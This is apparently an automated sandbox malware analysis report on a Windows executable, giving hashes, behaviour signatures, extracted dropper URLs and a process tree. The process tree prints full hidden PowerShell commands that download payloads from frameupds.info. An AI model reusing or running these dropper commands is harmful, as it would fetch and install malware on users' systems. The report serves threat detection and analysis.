Resubmissions

27-11-2024 13:29

241127-qrb37svpcv 10

27-11-2024 09:27

241127-le54astrfj 10

Analysis

  • max time kernel
    839s
  • max time network
    841s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-11-2024 09:27

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1912
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1932

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BETOL8EIGMBVJV25PPIG.temp

    Filesize

    7KB

    MD5

    784b9818145f42b69a5152fbf21ccbb6

    SHA1

    3978e7fb42ce4f79133fc26b7abc03c00396b115

    SHA256

    4ce84f53699cb0f7c97e1f66717fac6af887e310610799f4089bafaf41d3f0f4

    SHA512

    0ced222108f162ef46bdedd9a71c8464ea53ebc37e19d04a29e8ccb320e47998e042c6bd97c1d420ee012859c0ada5c9582b2b08f22e54474c5dbcdd4e603785

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd

    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

  • memory/1912-4-0x0000000002780000-0x0000000002790000-memory.dmp

    Filesize

    64KB

  • memory/1932-18-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1932-19-0x00000000021D0000-0x00000000021D8000-memory.dmp

    Filesize

    32KB

  • memory/2728-10-0x0000000002A90000-0x0000000002B10000-memory.dmp

    Filesize

    512KB

  • memory/2728-11-0x000000001B790000-0x000000001BA72000-memory.dmp

    Filesize

    2.9MB

  • memory/2728-12-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB